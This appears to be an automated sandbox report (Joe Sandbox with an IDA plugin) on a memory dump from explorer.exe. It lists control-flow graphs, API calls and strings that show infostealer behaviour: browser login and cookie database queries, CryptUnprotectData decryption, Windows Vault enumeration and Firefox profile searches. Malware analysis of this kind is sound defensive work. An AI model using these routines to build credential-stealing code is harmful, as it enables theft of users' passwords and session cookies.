c31272 28031->28033 28032->28006 28032->28009 28032->28010 28038 c31000 GetProcessHeap RtlAllocateHeap 28033->28038 28035 c3127e CryptStringToBinaryA 28035->28032 28036->28020 28037->28025 28038->28035 28040 c319bc 28039->28040 28042 c319d4 28039->28042 28041 c319c3 lstrlenW 28040->28041 28040->28042 28041->28042 28042->27972 28042->27973 28043->27992 28066 c99304 28068 c99344 28066->28068 28067 c99584 28067->28067 28068->28067 28069 c994da LoadLibraryA 28068->28069 28073 c9951f VirtualProtect VirtualProtect 28068->28073 28070 c994f1 28069->28070 28070->28068 28072 c99503 GetProcAddress 28070->28072 28072->28070 28074 c99519 28072->28074 28073->28067 28777 c55f08 102 API calls 28778 c56b14 memset memcpy _allmul 28078 c33717 28079 c31b6a 2 API calls 28078->28079 28082 c3372e 28079->28082 28080 c33c23 28082->28080 28128 c31000 GetProcessHeap RtlAllocateHeap 28082->28128 28083 c3376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28084 c337a8 28083->28084 28085 c3379e 28083->28085 28087 c84bec 89 API calls 28084->28087 28129 c3349b 31 API calls 28085->28129 28090 c337b3 28087->28090 28088 c33c15 DeleteFileW 28089 c31011 3 API calls 28088->28089 28089->28080 28090->28088 28091 c33c0c 28090->28091 28130 c31000 GetProcessHeap RtlAllocateHeap 28090->28130 28092 c83848 76 API calls 28091->28092 28092->28088 28094 c337e3 28131 c502ec 94 API calls 28094->28131 28096 c33bcc 28136 c4fb92 93 API calls 28096->28136 28098 c33bd9 lstrlen 28099 c33c05 28098->28099 28100 c33be5 28098->28100 28102 c31011 3 API calls 28099->28102 28137 c31798 lstrlen 28100->28137 28102->28091 28103 c33bf3 28138 c31798 lstrlen 28103->28138 28104 c33833 RtlCompareMemory 28105 c33a37 CryptUnprotectData 28104->28105 28113 c337ee 28104->28113 28105->28113 28108 c33bfc 28139 c31798 lstrlen 28108->28139 28110 c33867 RtlZeroMemory 28132 c31000 GetProcessHeap RtlAllocateHeap 28110->28132 28112 c31011 3 API calls 28112->28113 28113->28096 28113->28104 28113->28105 28113->28110 28113->28112 28114 c31fa7 19 API calls 28113->28114 28115 c33b0f lstrlen 28113->28115 28117 c31000 GetProcessHeap RtlAllocateHeap 28113->28117 28119 c33987 lstrlen 28113->28119 28122 c33ba3 lstrcat 28113->28122 28133 c32112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28113->28133 28134 c32112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28113->28134 28135 c502ec 94 API calls 28113->28135 28114->28113 28115->28113 28116 c33b21 lstrlen 28115->28116 28116->28113 28117->28113 28119->28113 28121 c33999 lstrlen 28119->28121 28120 c33b66 wsprintfA lstrlen 28120->28113 28120->28122 28121->28113 28122->28113 28124 c339de wsprintfA lstrlen 28125 c33a1b lstrcat 28124->28125 28126 c33a0d 28124->28126 28127 c31011 3 API calls 28125->28127 28126->28125 28127->28113 28128->28083 28129->28084 28130->28094 28131->28113 28132->28113 28133->28124 28134->28120 28135->28113 28136->28098 28137->28103 28138->28108 28139->28099 28140 c32b15 28141 c31953 6 API calls 28140->28141 28142 c32b1f FindFirstFileW 28141->28142 28144 c32c5c 28142->28144 28163 c32b4e 28142->28163 28145 c31011 3 API calls 28144->28145 28147 c32c63 28145->28147 28146 c32b59 lstrcmpiW 28149 c32b71 lstrcmpiW 28146->28149 28150 c32c3d FindNextFileW 28146->28150 28151 c31011 3 API calls 28147->28151 28148 c31953 6 API calls 28148->28163 28149->28150 28149->28163 28152 c32c51 FindClose 28150->28152 28150->28163 28153 c32c6a 28151->28153 28152->28144 28154 c3199d 9 API calls 28156 c32bdf StrStrIW 28154->28156 28155 c319b4 lstrlenW 28155->28163 28157 c32c10 StrStrIW 28156->28157 28160 c32bf1 28156->28160 28157->28160 28158 c31011 3 API calls 28158->28150 28159 c31cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28159->28160 28160->28157 28160->28158 28160->28159 28165 c3278e 41 API calls 28160->28165 28162 c3199d 9 API calls 28162->28163 28163->28146 28163->28148 28163->28154 28163->28155 28163->28162 28164 c31011 3 API calls 28163->28164 28164->28163 28165->28157 28166 c3411b 28167 c34045 50 API calls 28166->28167 28168 c3412b 28167->28168 28169 c34045 50 API calls 28168->28169 28170 c3413b 28169->28170 28676 c484a7 30 API calls 28783 c7c322 27 API calls 28680 c39925 18 API calls 28784 c3cb2a _allmul _allmul 28785 c6072d 19 API calls 28681 c40128 36 API calls 28683 c49534 39 API calls 28684 c5f130 22 API calls 28786 c4ff32 21 API calls 28787 c47b3d 18 API calls 28789 c40f3e 60 API calls 28578 c3413e 28579 c34045 50 API calls 28578->28579 28580 c3414e 28579->28580

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 c33717-c33730 call c31b6a 3 c33c37-c33c3d 0->3 4 c33736-c3374c 0->4 5 c33762-c3379c call c31000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 4->5 6 c3374e-c33757 call c3302d 4->6 11 c337a8-c337b5 call c84bec 5->11 12 c3379e-c337a3 call c3349b 5->12 10 c3375c-c3375e 6->10 10->5 16 c33c15-c33c1e DeleteFileW call c31011 11->16 17 c337bb-c337d3 call c6eeb8 11->17 12->11 21 c33c23-c33c28 16->21 22 c337d9-c337f1 call c31000 call c502ec 17->22 23 c33c0c-c33c10 call c83848 17->23 21->3 24 c33c2a-c33c32 call c32ffa 21->24 31 c33bd0-c33be3 call c4fb92 lstrlen 22->31 32 c337f7 22->32 23->16 24->3 38 c33c05-c33c07 call c31011 31->38 39 c33be5-c33c00 call c31798 * 3 31->39 33 c337fc-c33816 call c31fa7 32->33 41 c33bb6-c33bc6 call c502ec 33->41 42 c3381c-c3382d 33->42 38->23 39->38 41->33 55 c33bcc 41->55 45 c33833-c33843 RtlCompareMemory 42->45 46 c33a37-c33a51 CryptUnprotectData 42->46 45->46 50 c33849-c3384b 45->50 46->41 48 c33a57-c33a5c 46->48 48->41 52 c33a62-c33a78 call c31fa7 48->52 50->46 54 c33851-c33856 50->54 61 c33a86-c33a9d call c31fa7 52->61 62 c33a7a-c33a80 52->62 54->46 58 c3385c-c33861 54->58 55->31 58->46 60 c33867-c338ed RtlZeroMemory call c31000 58->60 73 c338f3-c33909 call c31fa7 60->73 74 c33a2e-c33a32 60->74 68 c33aab-c33ac2 call c31fa7 61->68 69 c33a9f-c33aa5 61->69 62->61 64 c33a82 62->64 64->61 79 c33ad0-c33aed call c31fa7 68->79 80 c33ac4-c33aca 68->80 69->68 71 c33aa7 69->71 71->68 83 c33917-c3392d call c31fa7 73->83 84 c3390b-c33911 73->84 75 c33bb1 call c31011 74->75 75->41 90 c33af7-c33b01 79->90 91 c33aef-c33af1 79->91 80->79 82 c33acc 80->82 82->79 92 c3393b-c33952 call c31fa7 83->92 93 c3392f-c33935 83->93 84->83 86 c33913 84->86 86->83 95 c33b03-c33b05 90->95 96 c33b0f-c33b1b lstrlen 90->96 91->90 94 c33af3 91->94 103 c33960-c33979 call c31fa7 92->103 104 c33954-c3395a 92->104 93->92 97 c33937 93->97 94->90 95->96 99 c33b07-c33b0b 95->99 96->41 100 c33b21-c33b2a lstrlen 96->100 97->92 99->96 100->41 102 c33b30-c33b4f call c31000 100->102 110 c33b51 102->110 111 c33b59-c33b93 call c32112 wsprintfA lstrlen 102->111 113 c33987-c33993 lstrlen 103->113 114 c3397b-c33981 103->114 104->103 106 c3395c 104->106 106->103 110->111 118 c33ba3-c33baf lstrcat 111->118 119 c33b95-c33ba1 call c3102f 111->119 113->74 117 c33999-c339a2 lstrlen 113->117 114->113 115 c33983 114->115 115->113 117->74 120 c339a8-c339c7 call c31000 117->120 118->75 119->118 125 c339d1-c33a0b call c32112 wsprintfA lstrlen 120->125 126 c339c9 120->126 129 c33a1b-c33a29 lstrcat call c31011 125->129 130 c33a0d-c33a19 call c3102f 125->130 126->125 129->74 130->129
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
                                                                                                                                                                  • Part of subcall function 00C31B6A: CloseHandle.KERNELBASE(00000000), ref: 00C31B8F
                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,00000000), ref: 00C33778
                                                                                                                                                                • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00C33782
                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 00C33789
                                                                                                                                                                • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00C33794
                                                                                                                                                                • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 00C3383B
                                                                                                                                                                • RtlZeroMemory.NTDLL(?,00000040), ref: 00C33870
                                                                                                                                                                • lstrlen.KERNEL32(?,?,?,?,?), ref: 00C3398B
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00C3399A
                                                                                                                                                                • wsprintfA.USER32 ref: 00C339F1
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?), ref: 00C339FD
                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00C33A21
                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C33A49
                                                                                                                                                                • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00C33B13
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00C33B22
                                                                                                                                                                • wsprintfA.USER32 ref: 00C33B79
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00C33B85
                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00C33BA9
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00C33BDA
                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00C33C16
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                                                • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                                                                                • API String ID: 584740257-404540950
                                                                                                                                                                • Opcode ID: dd448d6c890c140a3b5f47ac9d3636764b05076d19833e3cc29fc4ca58b14530
                                                                                                                                                                • Instruction ID: e1e57b84fcbd98ed3cafc2bd1464684d6fd0cf026ca560ca4876844b4197ac7d
                                                                                                                                                                • Opcode Fuzzy Hash: dd448d6c890c140a3b5f47ac9d3636764b05076d19833e3cc29fc4ca58b14530
                                                                                                                                                                • Instruction Fuzzy Hash: 46E1AB70218381AFD715DF64C884F2FBBE9AF89354F08482CF89587291DB35CA05DB56

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 134 c32198-c321c9 RtlZeroMemory GetVersionExW 135 c321d7-c321dc 134->135 136 c321cb-c321d0 134->136 138 c321de 135->138 139 c321e3-c321f6 LoadLibraryW 135->139 137 c321d2 136->137 136->138 137->135 138->139 140 c3249b-c324a3 139->140 141 c321fc-c3223e GetProcAddress * 5 139->141 142 c32492-c3249a FreeLibrary 141->142 143 c32244-c3224a 141->143 142->140 143->142 144 c32250-c32252 143->144 144->142 145 c32258-c3225a 144->145 145->142 146 c32260-c32265 145->146 146->142 147 c3226b-c32280 146->147 147->142 149 c32286-c322a5 147->149 151 c3248b-c3248f 149->151 152 c322ab-c322b3 149->152 151->142 153 c32483 152->153 154 c322b9-c322c5 152->154 153->151 155 c322c9-c322db 154->155 156 c322e1-c322f1 RtlCompareMemory 155->156 157 c32365-c32375 RtlCompareMemory 155->157 158 c32452-c32475 156->158 160 c322f7-c32348 call c31953 * 3 156->160 157->158 159 c3237b-c323c9 call c31953 * 3 157->159 158->155 163 c3247b-c3247f 158->163 176 c323e4-c323ea 159->176 177 c323cb-c323dc call c31953 159->177 160->176 178 c3234e-c32363 call c31953 160->178 163->153 181 c32431-c32433 176->181 182 c323ec-c323ee 176->182 190 c323e0 177->190 178->190 184 c32435-c32437 call c31011 181->184 185 c3243c-c3243e 181->185 187 c323f0-c323f2 182->187 188 c3242a-c3242c call c31011 182->188 184->185 192 c32440-c32442 call c31011 185->192 193 c32447-c32449 185->193 187->188 194 c323f4-c323f6 187->194 188->181 190->176 192->193 193->158 197 c3244b-c3244d call c31011 193->197 194->188 196 c323f8-c32406 StrStrIW 194->196 198 c32426 196->198 199 c32408-c32421 call c317c0 * 3 196->199 197->158 198->188 199->198
                                                                                                                                                                APIs
                                                                                                                                                                • RtlZeroMemory.NTDLL(?,00000114), ref: 00C321AF
                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00C321BE
                                                                                                                                                                • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 00C321E8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 00C3220A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00C32214
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00C32220
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00C3222A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00C32236
                                                                                                                                                                • RtlCompareMemory.NTDLL(?,00C91110,00000010), ref: 00C322E8
                                                                                                                                                                • RtlCompareMemory.NTDLL(?,00C91110,00000010), ref: 00C3236C
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994
                                                                                                                                                                • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 00C323FE
                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 00C32493
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                                                                                • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                                                • API String ID: 2583887280-2831467701
                                                                                                                                                                • Opcode ID: cc6e136b955fe0ff2f4f0494d1f503e3c6359048dc78e24a152f3692898d4d52
                                                                                                                                                                • Instruction ID: e1667eb7d144a0e88ae16231f30888bed0eea4b722bc6f480b72d4bc9e13e19b
                                                                                                                                                                • Opcode Fuzzy Hash: cc6e136b955fe0ff2f4f0494d1f503e3c6359048dc78e24a152f3692898d4d52
                                                                                                                                                                • Instruction Fuzzy Hash: AF919971A283019FDB18EF65C884A2FBBE9AF88704F04482DF99597261EB71DD01CB56

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 261 c33098-c330b1 call c31b6a 264 c330b7-c330cd 261->264 265 c333ba-c333c0 261->265 266 c330e3-c33128 call c31000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call c84bec 264->266 267 c330cf-c330d8 call c3302d 264->267 274 c3339b-c333a4 DeleteFileW call c31011 266->274 275 c3312e-c33146 call c6eeb8 266->275 270 c330dd-c330df 267->270 270->266 279 c333a9-c333ab 274->279 280 c33392-c33396 call c83848 275->280 281 c3314c-c33158 call c502ec 275->281 279->265 282 c333ad-c333b5 call c32ffa 279->282 280->274 287 c33389-c3338d call c4fb92 281->287 288 c3315e-c33161 281->288 282->265 287->280 290 c33165-c3317f call c31fa7 288->290 293 c33185-c33196 290->293 294 c3336f-c3337b call c502ec 290->294 296 c332cd-c332e7 CryptUnprotectData 293->296 297 c3319c-c331ac RtlCompareMemory 293->297 294->290 301 c33381-c33385 294->301 296->294 299 c332ed-c332f2 296->299 297->296 300 c331b2-c331b4 297->300 299->294 302 c332f4-c3330a call c31fa7 299->302 300->296 303 c331ba-c331bf 300->303 301->287 309 c33318-c3332f call c31fa7 302->309 310 c3330c-c33312 302->310 303->296 305 c331c5-c331ca 303->305 305->296 306 c331d0-c33253 RtlZeroMemory call c31000 305->306 318 c33255-c3326b call c31fa7 306->318 319 c332bd 306->319 316 c33331-c33337 309->316 317 c3333d-c33343 309->317 310->309 311 c33314 310->311 311->309 316->317 320 c33339 316->320 321 c33351-c3336a call c31798 * 3 317->321 322 c33345-c3334b 317->322 330 c33279-c3328e call c31fa7 318->330 331 c3326d-c33273 318->331 324 c332c1-c332c8 call c31011 319->324 320->317 321->294 322->321 325 c3334d 322->325 324->294 325->321 339 c33290-c33296 330->339 340 c3329c-c332bb call c31798 * 3 330->340 331->330 334 c33275 331->334 334->330 339->340 342 c33298 339->342 340->324 342->340
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
                                                                                                                                                                  • Part of subcall function 00C31B6A: CloseHandle.KERNELBASE(00000000), ref: 00C31B8F
                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,00000000), ref: 00C330F9
                                                                                                                                                                • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00C33103
                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 00C3310A
                                                                                                                                                                • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00C33115
                                                                                                                                                                • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 00C331A4
                                                                                                                                                                • RtlZeroMemory.NTDLL(?,00000040), ref: 00C331D7
                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C332DF
                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00C3339C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                                                • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                                                                • API String ID: 2757140130-4052020286
                                                                                                                                                                • Opcode ID: e4dc8d39327909a7fe5bd26dd1d703327c6573c4456b6627ac801b08325eb6b5
                                                                                                                                                                • Instruction ID: c8fe111f66432084b8ae30bc85e197be7c2fe5c93f0f4c5fddb803cb8d1f8430
                                                                                                                                                                • Opcode Fuzzy Hash: e4dc8d39327909a7fe5bd26dd1d703327c6573c4456b6627ac801b08325eb6b5
                                                                                                                                                                • Instruction Fuzzy Hash: C091D970218381AFD710EF64C884B2FBBE9AFC5744F08492CF895862A1DB31DE05CB66

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 413 c33ed9-c33ee7 414 c33fd1-c33fdb 413->414 415 c33eed-c33ef1 413->415 415->414 416 c33ef7-c33f21 call c31000 PathCombineW FindFirstFileW 415->416 419 c33f27-c33f30 416->419 420 c33fca-c33fcc call c31011 416->420 421 c33f32-c33f40 lstrcmpiW 419->421 422 c33f78-c33f86 lstrcmpiW 419->422 420->414 424 c33f42-c33f54 lstrcmpiW 421->424 425 c33faf-c33fbd FindNextFileW 421->425 422->425 426 c33f88-c33fa3 call c31000 PathCombineW call c33e04 422->426 424->425 428 c33f56-c33f76 call c31000 PathCombineW call c33ed9 424->428 425->419 427 c33fc3-c33fc4 FindClose 425->427 435 c33fa8-c33faa call c31011 426->435 427->420 428->435 435->425
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
                                                                                                                                                                  • Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A
                                                                                                                                                                • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 00C33F0A
                                                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00C33F16
                                                                                                                                                                • lstrcmpiW.KERNEL32(?,00C862CC), ref: 00C33F38
                                                                                                                                                                • lstrcmpiW.KERNEL32(?,00C862D0), ref: 00C33F4C
                                                                                                                                                                • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00C33F69
                                                                                                                                                                • lstrcmpiW.KERNEL32(?,Local State), ref: 00C33F7E
                                                                                                                                                                • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00C33F9B
                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C33FB5
                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 00C33FC4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                                                                • String ID: *.*$Local State
                                                                                                                                                                • API String ID: 3923353463-3324723383
                                                                                                                                                                • Opcode ID: 877f10a9b3f2f28a4cbaec7bb86c6a46976d2739574890c70fb522d5e2ea46b4
                                                                                                                                                                • Instruction ID: 1886774ecb6eb38bc2db90519fc707b279499318f46b9da94e1a9d0e98e24da0
                                                                                                                                                                • Opcode Fuzzy Hash: 877f10a9b3f2f28a4cbaec7bb86c6a46976d2739574890c70fb522d5e2ea46b4
                                                                                                                                                                • Instruction Fuzzy Hash: F521D0302103846FD714BBB0CC0CB6F76BC9F89355F440569F822C2192DB788A489769

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 438 c32b15-c32b48 call c31953 FindFirstFileW 442 c32b4e 438->442 443 c32c5c-c32c74 call c31011 * 2 438->443 444 c32b52-c32b57 442->444 446 c32b59-c32b6b lstrcmpiW 444->446 447 c32bc8-c32bef call c31953 call c3199d StrStrIW 444->447 450 c32b71-c32b83 lstrcmpiW 446->450 451 c32c3d-c32c4b FindNextFileW 446->451 461 c32bf1-c32bfa call c31cf7 447->461 462 c32c10-c32c1e StrStrIW 447->462 450->451 454 c32b89-c32b94 call c319b4 450->454 451->444 455 c32c51-c32c58 FindClose 451->455 463 c32b96-c32b9b 454->463 464 c32b9d 454->464 455->443 461->462 473 c32bfc-c32c0b call c3278e 461->473 467 c32c20-c32c29 call c31cf7 462->467 468 c32c36-c32c38 call c31011 462->468 466 c32b9f-c32bc3 call c31953 call c3199d call c32ae9 call c31011 463->466 464->466 466->447 467->468 478 c32c2b-c32c31 call c3287d 467->478 468->451 473->462 478->468
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994
                                                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 00C32B3D
                                                                                                                                                                • lstrcmpiW.KERNEL32(?,00C862CC), ref: 00C32B63
                                                                                                                                                                • lstrcmpiW.KERNEL32(?,00C862D0), ref: 00C32B7B
                                                                                                                                                                  • Part of subcall function 00C319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00C32CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00C319C4
                                                                                                                                                                • StrStrIW.SHLWAPI(00000000,logins.json), ref: 00C32BE7
                                                                                                                                                                • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00C32C16
                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C32C43
                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 00C32C52
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_2_c31000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                                                                • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                                                                • API String ID: 1108783765-3717368146
                                                                                                                                                                • Opcode ID: ffb76c61e7ea65dc3af180d254d31f7ca3a79a02db511299c66f71afbe11bea8
                                                                                                                                                                • Instruction ID: 5bd93ea88c3eebc02adf5e5e9762643f2db46648456f7698e79bad65cf8e2bd9
                                                                                                                                                                • Opcode Fuzzy Hash: ffb76c61e7ea65dc3af180d254d31f7ca3a79a02db511299c66f71afbe11bea8
                                                                                                                                                                • Instruction Fuzzy Hash: 6F3170303243054F9F14BF719C99B3E679AAB88704F08493CBD56D6282EB79CE05A75A

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 531 c31d4a-c31d5c 532 c31d62-c31d66 531->532 533 c31eb4-c31ebe 531->533 532->533 534 c31d6c-c31d77 call c319b4 532->534 537 c31d8b-c31d97 call c31953 534->537 538 c31d79-c31d89 call c31953 534->538 543 c31d9b-c31d9d 537->543 538->543 543->533 544 c31da3-c31db4 FindFirstFileW 543->544 545 c31dba 544->545 546 c31ead-c31eaf call c31011 544->546 548 c31dbe-c31dc3 545->548 546->533 549 c31dc5-c31dd7 lstrcmpiW 548->549 550 c31e3d-c31e6a call c31953 call c3199d lstrcmpiW 548->550 552 c31e8e-c31e9c FindNextFileW 549->552 553 c31ddd-c31def lstrcmpiW 549->553 561 c31e87-c31e89 call c31011 550->561 562 c31e6c-c31e75 call c31cf7 550->562 552->548 554 c31ea2-c31ea9 FindClose 552->554 553->552 556 c31df5-c31e00 call c319b4 553->556 554->546 563 c31e02-c31e07 556->563 564 c31e09 556->564 561->552 562->561 570 c31e77-c31e7f 562->570 566 c31e0b-c31e3b call c31953 call c3199d call c31d4a 563->566 564->566 566->561 570->561
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00C32CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00C319C4
                                                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00C31DA9
                                                                                                                                                                • lstrcmpiW.KERNEL32(?,00C862CC), ref: 00C31DCF
                                                                                                                                                                • lstrcmpiW.KERNEL32(?,00C862D0), ref: 00C31DE7
                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00C31E62
                                                                                                                                                                  • Part of subcall function 00C31CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00C32C27), ref: 00C31D02
                                                                                                                                                                  • Part of subcall function 00C31CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00C31D0D
                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C31E94
                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 00C31EA3
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
                                                                                                                                                                  • Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
                                                                                                                                                                  • Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994
                                                                                                                                                                Strings
